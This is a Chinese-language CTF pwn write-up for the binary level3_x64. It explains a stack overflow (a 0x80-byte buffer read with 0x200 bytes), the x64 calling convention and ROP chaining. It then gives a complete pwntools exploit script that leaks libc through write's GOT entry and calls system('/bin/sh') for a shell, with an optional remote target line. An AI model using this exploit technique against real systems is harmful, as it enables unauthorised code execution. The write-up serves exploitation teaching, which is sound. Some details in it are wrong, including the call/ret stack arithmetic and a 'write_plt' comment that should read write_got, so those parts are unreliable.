目标程序下载
提取码:5o0a环境:Ubuntu linux
-
工具
- pwn-gdb
- pwntools python库
- ROPgadget
( 这些工具可以到github官网找)
1.检查程序开了哪些安全机制
checksec 检查保护机制
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found 金丝雀
NX: NX enabled 栈不可执行Windows平台上称其为DEP
PIE: No PIE (0x8048000) 内存地址随机化机制,Windows平台上称其为ASLR
2.在ida中静态查看看程序中的漏洞点
可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节
多出来的 0x200-0x80 就会造成溢出
函数调用方式的基本介绍
32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数
而64位程序默认调用函数的方式则不同
- RDI 中存放第1个参数
- RSI 中存放第2个参数
- RDX 中存放第3个参数
- RCX 中存放第4个参数
- R8 中存放第5个参数
- R9 中存放第6个参数
- 如果还有更多的参数,再把过多那几个的参数像32位程序一样压入栈中
- 然后 call
rop 的基本介绍
这里只说一下64位程序的rop,了解完64位的rop,32位的程序稍微做一下函数调用方式上的改变就好了
比如:现在有3个函数 a(&arg1,arg2),b(arg3,arg4),c(arg1),其中b函数有栈溢出漏洞,a函数是个输入函数,c函数是system函数
我们要利用b函数的漏洞,运行c函数,而c函数需要从a函数上得到"/bin/sh"这种参数
该怎么做呢?
首先我们要知道 call 指令与 ret 指令是有两步操作的
call指令:
1. 先把下一句指令的地址压入栈顶 rsp+=8
2. 跳转到call后面跟的地址上去
ret指令:
1. 跳转到rsp所指的地址(之前的call压入的)
2. rsp-=8
如果我们调用函数时不使用call指令呢?
函数结束时,移动栈顶(清栈) jmp [rsp] ,rsp-=8
程序中找 pop rsi,pop rdi,ret 这种相连的指令(不相连也可以,不要再影响rsi,rdi就好),把地址记录下来pop_ret
程序中找 pop rdi,ret 这种相连的指令,把地址记录下来pop_ret2
好,我们把c函数的rbp+8的位置写 pop_ret 的地址
- rbp+8 pop_ret
- rbp+16 arg2
- rbp+24 arg1
- rbp+32 a函数的地址
- rbp+40 pop_ret2
- rbp+48 arg1
- rbp+56 c函数的地址
当b运行结束后,会返回到 pop_ret 位置
pop rsi rsi=arg2
pop rdi rdi=agr1
jmp a函数
a函数 执行完后 会ret 到pop_ret2
pop rdi rdi=arg1
然后运行c函数
回到我们的目标程序
gdb打开程序
gdb level3_x64 -q
b mian
vmmap
查看libc的系统位置
ROPgadget --binary level3_x64 --only 'pop|ret'
找到main函数的地址
from pwn import *
p = process("./level3_x64") #本地调试
#p = remote("x.x.x.x",xxxx) #远程调试remote(ip,port)
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
elf = ELF("./level3_x64")
pop_rdi_ret = 0x4006b3
pop_rsi_r15_ret = 0x4006b1
main_addr = 0x40061A
write_plt = elf.plt["write"]
write_got = elf.got["write"]
padding = (0x80 + 8 ) * "a"
#0x80字符串长度要覆盖过去,+8是要覆盖rbp
payload1 = padding + p64(pop_rdi_ret) +\
p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) +\
p64(0) + p64(write_plt) + p64(main_addr)
#通过plt表中的write调用 write(1,write_plt,...)
#第三个参数只要当前rdx寄存器中的数大于8就好
#然后返回main函数重新运行,准备重新触发漏洞
p.sendafter("Input:\n",payload1)
addr = u64(p.recv(6).ljust(8,"\x00"))
#通过write_plt找泄露libc中write的地址
libc.address = addr - libc.symbols["write"]
#通过write的地址 找libc基地址
binsh=libc.search("/bin/sh").next()
#通过libc基地址找libc中这个字符串的地址
system=libc.symbols["system"]
#通过libc基地址找libc中systemp函数的地址
payload2 = padding + p64(pop_rdi_ret)+ p64(binsh)+p64(system)
#system("bin/sh")
p.send(payload2)
p.interactive()